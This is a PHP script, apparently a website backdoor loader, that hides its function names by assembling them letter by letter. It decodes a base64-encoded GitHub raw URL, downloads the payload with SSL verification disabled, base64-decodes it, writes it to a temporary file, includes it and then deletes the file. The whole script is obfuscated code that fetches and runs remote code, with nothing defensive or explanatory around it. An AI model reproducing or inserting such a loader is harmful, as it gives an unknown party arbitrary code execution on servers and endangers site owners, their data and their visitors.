
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$function = chars();
function getRemoteCode($url, $function) {
    $code = @$function[1]($url);

    if ($code === false) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $code = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($http_code !== 200 || empty($code)) {
            return false;
        }
    }
    return $code;
}

function chars()
{
    $chars = range('a', 'z');
    return [
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[15] . $chars[20] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[6] . $chars[4] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[18] . $chars[19] . $chars[17] . '_' . $chars[17] . $chars[14] . $chars[19] . '13',
        $chars[2] . $chars[7] . $chars[12] . $chars[14] . $chars[3],
        $chars[1].$chars[0].$chars[18].$chars[4].'64_'.$chars[3].$chars[4].$chars[2].$chars[14].$chars[3].$chars[4],
    ];
}

if (!function_exists('get_magic_quotes_gpc')) {
    function get_magic_quotes_gpc() {
        return false;
    }
}

$url = $function[4]("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2FhZG5yc2Z5cS9NYW5hZ2VyL3JlZnMvaGVhZHMvbWFpbi9HUjBXRi50eHQ=", true);
$code = getRemoteCode($url, $function);

if ($code !== false) {
    try {
        ob_start();
        $code = $function[4]($code);
        // Tulis kode apa adanya ke file sementara tanpa menambahkan <?php
        $tempFile = tempnam(sys_get_temp_dir(), 'remote_code_');
        $function[0]($tempFile, $code);
        include $tempFile;
        unlink($tempFile);

        ob_end_flush();
    } catch (Throwable $e) {
        ob_end_clean();
        die("Terjadi kesalahan dalam eksekusi kode: " . $e->getMessage());
    }
} else {
    die("Gagal mengambil data dari URL.");
}
